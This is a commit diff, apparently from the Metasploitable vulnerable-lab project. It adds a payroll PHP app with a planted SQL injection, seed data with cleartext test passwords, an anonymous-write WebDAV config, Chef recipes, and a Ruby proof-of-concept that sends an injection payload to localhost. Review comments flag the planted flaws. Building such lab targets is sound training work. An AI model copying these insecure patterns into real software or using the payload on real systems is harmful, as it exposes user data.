Resolve merge conflict in Vagrantfile
commit
be04fc19d8
|
@ -170,6 +170,7 @@ Vagrant.configure("2") do |config|
|
|||
chef.add_recipe "metasploitable::samba"
|
||||
chef.add_recipe "metasploitable::unrealircd"
|
||||
chef.add_recipe "metasploitable::readme_app"
|
||||
chef.add_recipe "metasploitable::payroll_app"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
#
|
||||
# Distributed authoring and versioning (WebDAV)
|
||||
#
|
||||
# Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias
|
||||
# mod_auth_digest, mod_authn_file
|
||||
#
|
||||
|
||||
# The following example gives DAV write access to a directory called
|
||||
# "uploads" under the ServerRoot directory.
|
||||
#
|
||||
# The User/Group specified in httpd.conf needs to have write permissions
|
||||
# on the directory where the DavLockDB is placed and on any directory where
|
||||
# "Dav On" is specified.
|
||||
|
||||
Alias /uploads "/var/www/uploads"
|
||||
|
||||
<Directory "/var/www/uploads">
|
||||
AllowOverride All
|
||||
Dav On
|
||||
|
||||
<Limit GET HEAD POST DELETE OPTIONS PUT>
|
||||
Order Allow,Deny
|
||||
Allow from all
|
||||
</Limit>
|
||||
</Directory>
|
||||
|
||||
#
|
||||
# The following directives disable redirects on non-GET requests for
|
||||
# a directory that does not include the trailing slash. This fixes a
|
||||
# problem with several clients that do not appropriately handle
|
||||
# redirects for folders with DAV methods.
|
||||
#
|
||||
BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully
|
||||
BrowserMatch "MS FrontPage" redirect-carefully
|
||||
BrowserMatch "^WebDrive" redirect-carefully
|
||||
BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully
|
||||
BrowserMatch "^gnome-vfs/1.0" redirect-carefully
|
||||
BrowserMatch "^XML Spy" redirect-carefully
|
||||
BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully
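Review bot: The `<Directory "/var/www/uploads">` block turns on `Dav On` and allows GET, POST, PUT and DELETE from all hosts with no `AuthType`/`Require` directive, although the header lists mod_auth_digest and mod_authn_file as required modules. If the anonymous write access is deliberate for this lab image, say so in the file, e.g. `# Intentionally unauthenticated: lab target only, never reuse this block on a real host`, and drop the unused auth modules from the header. `AllowOverride All` on the same directory means per-directory override files are honoured in a tree that any client can write to, which deserves the same comment. `Order`/`Allow from all` is the Apache 2.2 access syntax; on a 2.4 server it depends on mod_access_compat being loaded, which this page does not show.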
|
|
@ -0,0 +1,60 @@
|
|||
-- phpMyAdmin SQL Dump
|
||||
-- version 3.5.8
|
||||
-- http://www.phpmyadmin.net
|
||||
--
|
||||
-- Host: 127.0.0.1
|
||||
-- Generation Time: Apr 10, 2017 at 04:42 PM
|
||||
-- Server version: 5.5.54-0ubuntu0.14.04.1
|
||||
-- PHP Version: 5.4.5
|
||||
|
||||
SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
|
||||
SET time_zone = "+00:00";
|
||||
|
||||
|
||||
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
|
||||
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
|
||||
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
|
||||
/*!40101 SET NAMES utf8 */;
|
||||
|
||||
--
|
||||
-- Database: `payroll`
|
||||
--
|
||||
|
||||
-- --------------------------------------------------------
|
||||
|
||||
--
|
||||
-- Table structure for table `users`
|
||||
--
|
||||
|
||||
CREATE TABLE IF NOT EXISTS `users` (
|
||||
`username` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`first_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`last_name` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`password` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
|
||||
`salary` int(20) NOT NULL
|
||||
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
|
||||
|
||||
--
|
||||
-- Dumping data for table `users`
|
||||
--
|
||||
|
||||
INSERT INTO `users` (`username`, `first_name`, `last_name`, `password`, `salary`) VALUES
|
||||
('luke_skywalker', 'Luke', 'Skywalker', 'password', 102000),
|
||||
('leia_organa', 'Leia', 'Organa', 'obiwan', 95600),
|
||||
('han_solo', 'Han', 'Solo', 'sh00t-first', 12000),
|
||||
('artoo_detoo', 'Artoo', 'Detoo', 'beep_b00p', 22000),
|
||||
('c_three_pio', 'C', 'Threepio', 'pr0t0c0l', 32000),
|
||||
('ben_kenobi', 'Ben', 'Kenobi', 'thats_no_moon', 1000000),
|
||||
('darth_vader', 'Darth', 'Vader', 'd@rk_sid3', 666000),
|
||||
('anakin_skywalker', 'Anakin', 'Skywalker', 'yipp33!!', 0),
|
||||
('jarjar_binks', 'Jar-Jar', 'Binks', 'mesah_p@ssw0rd', 2000),
|
||||
('lando_calrissian', 'Lando', 'Calrissian', 'b@ckstab', 4000000),
|
||||
('boba_fett', 'Boba', 'Fett', 'mandalorian1', 2000000),
|
||||
('jabba_hutt', 'Jabba', 'The Hutt', 'not-a-slug12', 10000000),
|
||||
('greedo', 'Greedo', 'Rodian', 'hanShotFirst!', 500000),
|
||||
('chewbacca', 'Chewbacca', '', 'rwaaaaawr5', 4500),
|
||||
('kylo_ren', 'Kylo', 'Ren', 'daddy_issues1', 66600);
|
||||
|
||||
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
|
||||
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
|
||||
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
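Review bot: The `users` table stores `password` as cleartext in a `varchar(40)` column and the dump ships fifteen such values, with nothing in the file saying they are fixture data. A header comment such as `-- Fixture data for the deliberately vulnerable payroll lab app; not real credentials` would keep the file from being mistaken for, or copied into, a real schema. The table also has no primary key or unique index on `username`, so importing the dump twice silently duplicates every row; adding `PRIMARY KEY (username)` to the `CREATE TABLE` would make a second import fail loudly instead.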
|
|
@ -0,0 +1,64 @@
|
|||
<?php
|
||||
|
||||
$conn = new mysqli('127.0.0.1', 'root', 'sploitme', 'payroll');
|
||||
if ($conn->connect_error) {
|
||||
die("Connection failed: " . $conn->connect_error);
|
||||
}
|
||||
?>
|
||||
|
||||
<?php
|
||||
if (!isset($_POST['s'])) {
|
||||
?>
|
||||
<center>
|
||||
<form action="" method="post">
|
||||
<h2>Payroll Login</h2>
|
||||
<table style="border-radius: 25px; border: 2px solid black; padding: 20px;">
|
||||
<tr>
|
||||
<td>User</td>
|
||||
<td><input type="text" name="user"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Password</td>
|
||||
<td><input type="password" name="password"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td><input type="submit" value="OK" name="s">
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</center>
|
||||
<?php
|
||||
}
|
||||
?>
|
||||
|
||||
<?php
|
||||
if($_POST['s']){
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['password'];
|
||||
$sql = "select username, first_name, last_name, salary from users where username = '$user' and password = '$pass'";
|
||||
|
||||
if ($conn->multi_query($sql)) {
|
||||
do {
|
||||
/* store first result set */
|
||||
echo "<center>";
|
||||
echo "<h2>Welcome, " . $user . "</h2><br>";
|
||||
echo "<table style='border-radius: 25px; border: 2px solid black;' cellspacing=30>";
|
||||
echo "<tr><th>Username</th><th>First Name</th><th>Last Name</th><th>Salary</th></tr>";
|
||||
if ($result = $conn->store_result()) {
|
||||
while ($row = $result->fetch_assoc()) {
|
||||
$keys = array_keys($row);
|
||||
echo "<tr>";
|
||||
foreach ($keys as $key) {
|
||||
echo "<td>" . $row[$key] . "</td>";
|
||||
}
|
||||
echo "</tr>\n";
|
||||
}
|
||||
$result->free();
|
||||
}
|
||||
if (!$conn->more_results()) {
|
||||
echo "</table></center>";
|
||||
}
|
||||
} while ($conn->next_result());
|
||||
}
|
||||
}
|
||||
?>
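Review bot: The login query `$sql = "select ... where username = '$user' and password = '$pass'"` is built from raw `$_POST` values and run through `multi_query()`, and `$user` and every `$row[$key]` are echoed without `htmlspecialchars()`; given the PoC script added in the same commit this looks deliberate, but nothing in the file says so. Add a header comment along the lines of `// INTENTIONALLY VULNERABLE (SQL injection, unescaped output): lab target only, do not deploy` so the pattern is not copied as working code. Independent of the planted flaw, `if($_POST['s'])` reads an unset index on a plain GET and raises a notice; `if (isset($_POST['s'])) {` matches the check used for the form above. The connection also logs in as MySQL `root` with the password in the source, which widens what any query on this page can reach beyond the `payroll` database.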
|
|
@ -0,0 +1,14 @@
|
|||
require 'net/http'
|
||||
|
||||
url = "http://127.0.0.1/payroll_app.php"
|
||||
uri = URI(url)
|
||||
user = 'luke_skywalker'
|
||||
injection = "password'; select password from users where username='' OR ''='"
|
||||
|
||||
puts "Making POST request to #{uri} with the following parameters:"
|
||||
puts "'user' = #{user}"
|
||||
puts "'password' = #{injection}"
|
||||
res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
|
||||
|
||||
puts "Response body is #{res.body}"
|
||||
puts "Done"
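Review bot: `res.body` is printed without looking at the response status, so a 404 or 500 from a missing or broken `payroll_app.php` still ends in "Done" and reads as a completed run. Check the status before the last two lines, e.g. `abort "unexpected HTTP #{res.code}" unless res.is_a?(Net::HTTPSuccess)`. The script also has no header comment; one line stating that it demonstrates the payroll app's planted SQL injection against the local lab VM only would make its scope clear to whoever finds it under `/home/vagrant/poc`.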
|
|
@ -17,6 +17,11 @@ directory '/var/www/cgi-bin' do
|
|||
recursive true
|
||||
end
|
||||
|
||||
directory '/var/www/uploads' do
|
||||
mode '0777'
|
||||
recursive true
|
||||
end
|
||||
|
||||
cookbook_file '/var/www/cgi-bin/hello_world.sh' do
|
||||
source 'apache/hello_world.sh'
|
||||
mode '0755'
|
||||
|
@ -27,16 +32,27 @@ cookbook_file '/etc/apache2/conf-available/cgi-bin.conf' do
|
|||
mode '0644'
|
||||
end
|
||||
|
||||
execute 'enable-cgi-mod' do
|
||||
command 'a2enmod cgi'
|
||||
cookbook_file '/etc/apache2/conf-available/dav.conf' do
|
||||
source 'apache/dav.conf'
|
||||
mode '0644'
|
||||
end
|
||||
|
||||
execute 'enable-cgi-bin-conf' do
|
||||
command 'a2enconf cgi-bin'
|
||||
bash "configure cgi" do
|
||||
code <<-EOH
|
||||
a2enmod cgi
|
||||
a2enconf cgi-bin
|
||||
a2disconf serve-cgi-bin
|
||||
EOH
|
||||
end
|
||||
|
||||
execute 'disable-serve-cgi-bin-conf' do
|
||||
command 'a2disconf serve-cgi-bin'
|
||||
bash "configure webDAV" do
|
||||
code <<-EOH
|
||||
a2enmod dav
|
||||
a2enmod dav_fs
|
||||
a2enmod dav_lock
|
||||
a2enmod auth_digest
|
||||
a2enconf dav
|
||||
EOH
|
||||
end
|
||||
|
||||
execute 'make /var/www/html writeable' do
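Review bot: In the first hunk, `directory '/var/www/uploads'` is created with `mode '0777'` and no `owner`/`group`, so every local account can write to the DAV tree, not only the Apache user that the dav.conf comment says needs write permission. If that is part of the lab's intended weakness, a comment above the resource should say so; otherwise `owner 'www-data'` with `mode '0755'` would be enough for WebDAV writes (assuming Apache runs as `www-data`, which this page does not show). In the second hunk the `bash "configure webDAV"` block enables `auth_digest`, which dav.conf never uses, and neither `bash` block visibly notifies Apache to reload. The resource that follows them continues outside the hunk, so a reload may already be handled there.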
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
#
|
||||
# Cookbook:: metasploitable
|
||||
# Recipe:: payroll_app
|
||||
# Copyright:: 2017, Rapid7, All Rights Reserved.
|
||||
|
||||
cookbook_file '/var/www/html/payroll_app.php' do
|
||||
source 'payroll_app/payroll_app.php'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
cookbook_file '/tmp/payroll.sql' do
|
||||
source 'payroll_app/payroll.sql'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
directory '/home/vagrant/poc/payroll_app/' do
|
||||
mode '0755'
|
||||
owner 'vagrant'
|
||||
recursive true
|
||||
end
|
||||
|
||||
cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
|
||||
source 'payroll_app/poc.rb'
|
||||
mode '0755'
|
||||
end
|
||||
|
||||
bash 'create payroll database and import data' do
|
||||
code <<-EOH
|
||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"
|
||||
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" payroll < /tmp/payroll.sql
|
||||
EOH
|
||||
end
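Review bot: The `bash 'create payroll database and import data'` resource has no guard, so on a second converge `CREATE DATABASE payroll;` errors because the database exists and, since the heredoc has no `set -e`, the import presumably still runs and inserts every user row again (the `users` table has no unique key to stop it). A guard such as `not_if "mysql -S /var/run/mysql-default/mysqld.sock --user=root --password=sploitme -e 'USE payroll'"` makes the resource idempotent. The `cookbook_file` resources use `mode '0755'` on a PHP page and an SQL dump that never need the execute bit (`'0644'` is enough). `/tmp/payroll.sql`, which holds the seeded passwords, is also left world-readable in `/tmp` after the import.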
|
|
@ -35,7 +35,7 @@ end
|
|||
bash "compile and install php" do
|
||||
code <<-EOH
|
||||
cd /home/vagrant/php-5.4.5
|
||||
./configure --with-apxs2=/usr/bin/apxs --with-mysql
|
||||
./configure --with-apxs2=/usr/bin/apxs --with-mysqli --enable-embedded-mysqli
|
||||
make
|
||||
make install
|
||||
EOH
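Review bot: Dropping `--with-mysql` from the `./configure` line (assuming the `--with-mysqli --enable-embedded-mysqli` line is the new side, since this page has lost the +/- markers) removes the `mysql_*` extension for any other PHP page on the image that still uses it. `./configure --with-apxs2=/usr/bin/apxs --with-mysql --with-mysqli` would keep both. As far as I know, `--enable-embedded-mysqli` is meant for linking the embedded MySQL server library and is documented as not working with the native driver that a bare `--with-mysqli` selects on PHP 5.4, so it is probably a no-op here and can go. The `end` of the `bash "compile and install php"` block and any guard on it are outside the hunk.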
|
||||
|
|